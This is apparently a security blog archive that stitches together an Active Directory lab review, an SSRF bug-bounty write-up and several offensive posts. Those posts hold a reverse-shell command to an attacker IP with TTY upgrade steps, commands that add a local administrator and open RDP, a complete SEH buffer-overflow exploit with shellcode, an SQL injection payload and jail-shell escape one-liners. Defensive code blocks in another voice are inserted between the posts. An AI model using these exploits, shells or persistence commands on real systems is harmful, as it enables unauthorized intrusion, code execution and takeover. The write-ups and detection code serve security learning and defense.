Active Directory Labs Journey


Hello All,

It has been a long time since I wrote my last blog post. Hopefully I will get back on track and soon write the posts that are on my to-do list. So, without wasting more time, let's focus on the Active Directory Lab Journey.

Basics

The purpose of this post is to review the Active Directory Lab course, which is hosted by Pentester Academy and designed by Nikhil Mittal. As their website states, the course is indeed "... designed to provide a platform for security professionals to understand, analyze and practice threats and attacks in a modern Active Directory environment. The lab is beginner friendly and comes with a complete video course and lab manual."
The course comes with options of 30, 60 or 90 days of lab access. I chose the 30-day option as I was already familiar with the Windows AD environment and some attack vectors. My aim was to learn and fill the gaps I may not have known about.

They also provide a challenge lab with their Windows Red Team Labs course; you can find a detailed review of that course here: https://3xpl01tc0d3r.blogspot.com/2019/03/windows-red-team-lab-journey.html

Course Material and Labs

The course is packed with videos and a manual, along with the solutions to the lab objectives.

Getting Started

You can choose to start your lab access immediately or at any time within the next 90 days, based on lab availability.
On the day you choose to start the lab, you will be provided with a VPN and a Windows VM. You connect to the student machine via RDP. All details are provided in the email.

Lab Network (image: lab network diagram; image credits: pentesteracademy.com)
Lab Review

Students are given access to the student machine (Windows 10) as a low-privilege user in the Active Directory. The machine is domain-joined and has antivirus running. Students are tasked with escalating privileges on the student machine to gain admin rights and disabling the antivirus in order to load the tools that will help them progress through the course and lab. The student machine can only be reached via RDP.

The course lets students watch the videos and then solve the tasks listed at the end of each video, gaining hands-on understanding in the lab.

The course helped me learn many new concepts and clarified a lot of my understanding of the Windows AD environment. The lab is designed to make students aware of Windows misconfigurations and the ways an enterprise network can be compromised through them. The lab does not make use of any known exploits and does not encourage the use of exploitation techniques to progress through the course.

The course has 23 learning objectives, each containing multiple tasks, that build on one another as you progress through the course.

The course is very informative and the best place to start for any beginner or red teamer who wants a good understanding of the various attack vectors that can be leveraged to compromise an enterprise.

I really liked the course content, and the lab is fantastic.

My Approach

After clearing the exam, a lot of my friends asked me how I approached the lab (as a few have enrolled), or how they should approach it once they enroll.
My approach was to go through the course videos one by one and understand each of them.
I also made notes along the way and then tried to solve the learning objectives as they came up at the end of each topic. Where I was stuck, I referred to the lab walkthrough manual or went through the lab walkthrough video.

The topics covered in the course are to the point, so depending on your background you may need to read more on a few topics before proceeding.

Exam Review

The exam is completely practical. There are 5 systems in the exam, in a forest environment. Students are given 24 hours to complete the exam and the next 48 hours to write and submit a detailed report. The report should contain a step-by-step walkthrough of how each system was compromised. It should also contain practical recommendations for all the vulnerabilities the student exploited to gain access. The goal of the exam is to gain command execution on the systems with any privilege.

To clear the exam, a minimum of three boxes need to be compromised, and the report quality should be good. The focus is not just on compromising all the boxes but on writing a good report as well.

I was able to compromise 4 machines and on the last one I got partial execution.

Tip: Make notes of the commands you practice in the labs, along with a short description of each. This comes in really handy at exam time.

Conclusion

The course is very informative and recommended for everyone. Special thanks to Nikhil Mittal for this course.

Note: All opinions on the blog are mine, reading of any or all information on https://w00troot.blogspot.com is of your own free will.

How I found SSRF on TheFacebook.com

Hello World,

Hope you all are doing well. I know you are reading this post after seeing the title: SSRF on Thefacebook.com's server? dafaq? seriously?

Trust me, the PoC is quite simple. The only thing is that I was lucky enough to enumerate and find a domain vulnerable to this attack.

How I found this domain!


I got a WhatsApp message in one of the cyber security groups about "Facebook Internal IP Disclosure". I visited the page to get myself motivated to do some bug hunting.

To my surprise, the website mentioned in the article was hosting a page with Universal Description Discovery and Integration (UDDI) functionality, running on an Oracle WebLogic web server.

As you may be aware, WebLogic server is known to have been vulnerable to SSRF. I knew of the vulnerability because I had encountered it during a security assessment for a client.

Then I had mixed thoughts: Facebook would definitely have patched the vulnerability, and so on, but what's the harm in trying.

Soon I fired up my laptop and the tools to check whether the site was vulnerable to SSRF.

Steps to reproduce, as submitted to Facebook.


Step 1 - Open https://esbmbltest.thefacebook.com/uddiexplorer/SearchPublicRegistries.jsp

Step 2 - Enter any information and capture the request in a proxy tool such as Burp Suite or IronWASP.

Step 3 - Change the operator parameter to an internal IP range or any public IP.

Step 4 - The application server successfully connects to the external IP supplied in the operator parameter. This shows that an external SSRF vulnerability is present.

Step 5 - To test internal SSRF, input an internal IP range and forward the request. The server responds with a time delay when a connection is made.

The response delay is around 800-900 milliseconds when the host is up and running.

The response delay is 120,000 milliseconds when the host is down.

With this information we can enumerate the Internal infrastructure behind a firewalled environment.

Step 6 - For further understanding, intercept the request in IronWASP and browse the page.

Step 7 - Select the logs and the request made, then select Run Modules on this Request/Response and choose SSRF Exploitation Framework.

Step 8 - Select Set Injection Points, select the operator parameter in the body and click Done.

Step 9 - Select Port Scan or Network Discovery and input an IP range.

Step 10 - The active internal IPs can now be enumerated.
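From the defender's side, the class of bug walked through in the steps above is closed by two controls: the server must only fetch destinations it is meant to talk to, and it must refuse any destination that resolves into internal address space. The block below is an added example (mine, not from the write-up, Facebook or WebLogic) with both the validation a server should apply to a user-supplied URL such as the operator parameter and a detection pass over access-log lines. ALLOWED_HOSTS, the resolver addresses and SAMPLE_LOG are constructed; the log assumes the parameter is visible in the query string (for the POST form shown above it would have to come from a WAF or application log).

```python
"""Added example: SSRF destination validation and log-based probe detection.
Hosts, addresses and log lines are constructed for illustration."""
import ipaddress
import re
import socket
from urllib.parse import parse_qs, urlparse

# Hypothetical allowlist of registries the application is meant to reach.
ALLOWED_HOSTS = {"uddi.example.net", "registry.example.org"}


def _is_public(addr: str) -> bool:
    """True only for globally routable unicast addresses (raises ValueError
    if addr is not an IP literal)."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url: str, resolver=None) -> tuple:
    """Return (ok, reason) for a URL the server is about to fetch.
    resolver(host) -> [ip, ...] is injectable so the check runs offline;
    by default it does a real DNS lookup."""
    resolver = resolver or (lambda h: [r[4][0] for r in socket.getaddrinfo(h, None)])
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parsed.username or parsed.password:
        return False, "credentials in URL"
    host = parsed.hostname or ""
    if host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"
    # Check every resolved address: an allowlisted name can still resolve to
    # an internal address (DNS rebinding, compromised zone).
    for addr in resolver(host):
        if not _is_public(addr):
            return False, f"resolves to non-public address {addr}"
    return True, "ok"


# Constructed access-log lines; the last one is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2019:10:01:02 +0000] "POST /uddiexplorer/SearchPublicRegistries.jsp?operator=http://uddi.example.net/inquiry HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2019:10:01:09 +0000] "POST /uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.5:7001/ HTTP/1.1" 200 812
203.0.113.7 - - [10/Mar/2019:10:01:15 +0000] "POST /uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22/ HTTP/1.1" 200 790
198.51.100.4 - - [10/Mar/2019:10:02:00 +0000] "GET /index.jsp HTTP/1.1" 200 2048
"""

_REQ = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')


def flag_ssrf_probes(log_text: str) -> list:
    """Return (source_ip, target) for each request whose operator parameter
    is an IP literal in non-public address space."""
    hits = []
    for line in log_text.splitlines():
        m = _REQ.match(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group("path")).query)
        for target in query.get("operator", []):
            host = urlparse(target).hostname
            if host is None:
                continue
            try:
                if not _is_public(host):
                    hits.append((m.group("src"), target))
            except ValueError:
                # A hostname rather than an IP literal: a resolver-based check
                # would go here; literal internal IPs are the common probe shape.
                pass
    return hits


if __name__ == "__main__":
    print(validate_outbound_url("http://10.0.0.5:7001/", resolver=lambda h: ["10.0.0.5"]))
    for src, target in flag_ssrf_probes(SAMPLE_LOG):
        print(f"SSRF probe from {src} -> {target}")
```

The allowlist is the control that matters most: even with a perfect address check, an open fetcher still lets an attacker use the server as a proxy to arbitrary public hosts, which is exactly what Step 4 above demonstrates.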
I also submitted a video PoC for the vulnerability.


Facebook accepted the vulnerability and awarded me a good bounty, as I reported the SSRF vulnerability on 2 hosts. :D



I hope you liked the write-up; I would appreciate your feedback in the comments below ;)

Opinions are mine on the blog.

Using Vi in Low Privilege Shell

This post shows how to upgrade a reverse shell to a fully featured TTY shell and use the Vi editor in a low-privilege shell.


Step 1: Grab a reverse shell.

Victim machine: ncat -nv 192.168.125.158 443 -e /bin/bash

Kali machine: nc -lvp 443

Step 2: Break the jail shell.

Command: python -c 'import pty; pty.spawn("/bin/bash")'

Step 3: Background the current shell with CTRL + Z.

Step 4: We need some information about our current terminal so that the backgrounded shell can be matched to it.

# echo $TERM
# stty -a

The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 24; columns 80").

Step 5: With the shell in the background, set the current terminal to raw mode with echo disabled, so keystrokes are passed straight through to the remote shell:

# stty raw -echo

The terminal will now look odd, and anything typed will not be shown, but it will be processed.

Step 6: Bring the shell back to the foreground by typing "fg". This re-opens the reverse shell, but the formatting will be off, so reinitialize the terminal with reset.

# fg
# reset

Press Enter after 'fg' and again after 'reset'. You will get the shell terminal back.

Step 7: Since the formatting is off, we now match the reverse shell to our Kali terminal using the information gathered in step 4. Enter the following commands:

$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows 24 columns 80

Now we have a fully featured TTY shell with Tab auto-completion, and we can use the Vi editor in the low-privilege shell.

Adding User Via Windows Command Line

Adding users in Windows


Step 1 - Add User

net user 'username' 'password' /add

C:\WINDOWS\system32>net user thunder password /add 

Step 2 - Add the new User to Remote Desktop Group

net localgroup "Remote Desktop users" 'username' /add

C:\WINDOWS\system32>net localgroup "Remote Desktop users" thunder /add

Step 3 - Add the new user to the Administrators group

net localgroup Administrators 'username' /add

C:\WINDOWS\system32>net localgroup Administrators thunder /add

All the above steps in a Single Command

C:\WINDOWS\system32>net user thunder password /add && net localgroup "Remote Desktop users" thunder /add && net localgroup Administrators thunder /add

Note: Make sure you have administrator privileges.
If you get an error, a password complexity policy may be set on the remote machine; try a complex password.

Enable Remote Desktop Protocol Services


C:\WINDOWS\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Add Firewall Rule in Windows to Allow Remote Desktop Connection


C:\WINDOWS\system32>netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
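Every command in this post leaves a process-creation record when command-line auditing is on, and the full sequence (local account created, added to Remote Desktop Users and Administrators, RDP enabled in the registry, inbound 3389 rule added) is a classic persistence pattern a detection team should score as a whole rather than alert on piecemeal. The block below is an added example (mine, not from the post) that runs rule matching over constructed Windows Security event 4688 records; the field names follow the event's data names, but the computer names, logon ids and command lines are made up.

```python
"""Added example: score Windows 4688 (process creation) events for the
local-admin + RDP enablement sequence. All sample events are constructed."""
import re

# (rule name, regex over the command line, weight)
RULES = [
    ("local user created",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I), 2),
    ("added to Remote Desktop Users",
     re.compile(r'\bnet(?:1)?(?:\.exe)?\s+localgroup\s+"?remote desktop users"?\s+\S+\s+/add\b', re.I), 3),
    ("added to Administrators",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), 4),
    ("RDP enabled via registry",
     re.compile(r"fDenyTSConnections\b.*\s/d\s+0\b", re.I), 3),
    ("inbound 3389 firewall rule",
     re.compile(r"advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=3389\b", re.I), 3),
]

ALERT_THRESHOLD = 5  # a single "net user /add" alone is below this


def classify(command_line: str) -> list:
    """Names of all rules matched by one command line. A chained
    `a && b && c` line matches every rule in the chain."""
    return [name for name, rx, _ in RULES if rx.search(command_line)]


def score_session(events: list) -> dict:
    """Group 4688 events by (computer, logon id), add up rule weights and
    return the sessions at or above ALERT_THRESHOLD with their rule names."""
    sessions = {}
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        matched = classify(ev.get("CommandLine", ""))
        if not matched:
            continue
        key = (ev["Computer"], ev["SubjectLogonId"])
        entry = sessions.setdefault(key, {"score": 0, "rules": []})
        for name in matched:
            entry["score"] += next(w for n, _, w in RULES if n == name)
            entry["rules"].append(name)
    return {k: v for k, v in sessions.items() if v["score"] >= ALERT_THRESHOLD}


# Constructed events. 0x3e7 is the SYSTEM logon session; the others are made up.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01", "SubjectLogonId": "0x1a2b3",
     "CommandLine": 'net user thunder password /add && net localgroup "Remote Desktop users" thunder /add && net localgroup Administrators thunder /add'},
    {"EventID": 4688, "Computer": "WS01", "SubjectLogonId": "0x1a2b3",
     "CommandLine": 'reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"EventID": 4688, "Computer": "WS01", "SubjectLogonId": "0x1a2b3",
     "CommandLine": 'netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389'},
    {"EventID": 4688, "Computer": "WS02", "SubjectLogonId": "0x3e7",
     "CommandLine": "net user /domain"},
    {"EventID": 4688, "Computer": "WS02", "SubjectLogonId": "0x5c1",
     "CommandLine": "net user svc_backup P@ss /add"},
]


if __name__ == "__main__":
    for (computer, logon), info in score_session(SAMPLE_EVENTS).items():
        print(f"{computer} logon {logon}: score {info['score']} -> {', '.join(info['rules'])}")
```

The weights are deliberately asymmetric: membership in Administrators outweighs the account creation itself, and the RDP and firewall changes only push a session over the threshold when they follow an account change in the same logon session, which is what separates this pattern from routine helpdesk work.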

Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)

#############################################################################
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
#############################################################################

# Vulnerable Software: Easy MPEG/AVI/DIVX/WMV/RM to DVD
# Vulnerability Name: Buffer Overflow (SEH)
# Exploit Author: Venkat Rajgor
# Vendor Homepage: http://www.divxtodvd.net/
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On: Windows 7 x64
#############################################################################
Exploit Proof of Concept:

#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 05-10-2017
# Exploit Author: Venkat Rajgor
# Vendor Homepage: http://www.divxtodvd.net/
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On: Windows 7 x64
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of evil.txt
###############################################################################
filename = "evil.txt"
# Buffer: padding up to the SEH record
buffer = "\x41" * 1008
# nSEH: short jump over the SEH record
nSEH = "\xEB\x06\x90\x90"
# SEH: address of a POP POP RET
SEH = "\x59\x78\x03\x10"
# Bad Chars
badchars = "\x00\x0A\x0D\x1A"

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c

# Payload To Popup Calculator
shell = (
    "\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
    "\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52"
    "\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61"
    "\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e"
    "\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99"
    "\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f"
    "\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98"
    "\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94"
    "\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23"
    "\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1"
    "\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff"
    "\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59"
    "\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3"
    "\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09"
    "\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96"
)

# NOP sled followed by the payload
evil = "\x90" * 20 + shell
# Final buffer: padding + nSEH + SEH + sled + payload
buffer = "A" * 1008 + nSEH + SEH + evil

textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()

##############################################################################
# End of Exploit

Screenshot for Reverse Shell: (image not preserved)

PHP Melody 2.6.1 SQL Injection - CVE-2017-15081


###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),null,null,null,null,null,null,null,null,null-- -
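The payload works because the playlist value is spliced into the query as text, so a closing quote and a UNION turn the lookup into a second SELECT that the application happily renders. The fix is to bind the value instead of concatenating it. The block below is an added example (mine, not the advisory's and not PHP Melody's code) that shows the vulnerable and the bound form side by side with sqlite3 so it runs offline; the table and rows are constructed, and the UNION payload is the advisory's shape adapted to SQLite, which uses || and sqlite_version() in place of MySQL's concat() and version().

```python
"""Added example: string-built query vs. bound parameter for a playlist
lookup, exercised with a UNION payload of the advisory's shape.
The schema and data are constructed and do not reflect PHP Melody."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE playlists (id INTEGER, name TEXT, owner TEXT)")
    conn.executemany("INSERT INTO playlists VALUES (?, ?, ?)",
                     [(1, "summer", "alice"), (2, "work", "bob")])
    return conn


def lookup_vulnerable(conn, playlist: str) -> list:
    """The bug class in the advisory: untrusted input spliced into the SQL."""
    sql = "SELECT id, name, owner FROM playlists WHERE id = '%s'" % playlist
    return conn.execute(sql).fetchall()


def lookup_safe(conn, playlist: str) -> list:
    """Fix: the value is bound, so it can only ever be compared as data."""
    sql = "SELECT id, name, owner FROM playlists WHERE id = ?"
    return conn.execute(sql, (playlist,)).fetchall()


# Same shape as the advisory's payload: close the quote, UNION in a row whose
# second column carries the database version, comment out the trailing quote.
PAYLOAD = "' UNION SELECT null, 'v=' || sqlite_version(), null-- -"


def demo() -> tuple:
    """Return (rows from the vulnerable lookup, rows from the bound lookup)
    for the same payload."""
    conn = make_db()
    return lookup_vulnerable(conn, PAYLOAD), lookup_safe(conn, PAYLOAD)


if __name__ == "__main__":
    leaked, bound = demo()
    print("vulnerable:", leaked)   # one injected row with the version string
    print("bound:     ", bound)    # no rows: the payload is just a non-matching id
```

The bound form does not reject the payload or sanitise it; it simply never parses it as SQL, which is why parameterisation is the correct fix and input filtering is not.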

###################################################
Proof of Concept: (screenshot not preserved)

Breaking the Jail Shell

Spawning a TTY Shell

Commands to spawn a TTY shell from a limited / jail shell in Linux, useful for running commands like su from reverse shells.


Python TTY Shell

python -c 'import pty; pty.spawn("/bin/sh")'

python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import os; os.system("/bin/bash")'

Spawn Interactive shell

/bin/sh -i

/bin/bash -i

Spawn Perl TTY Shell

exec "/bin/sh";

perl -e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

:!bash

Spawn TTY Shell from Nmap

!sh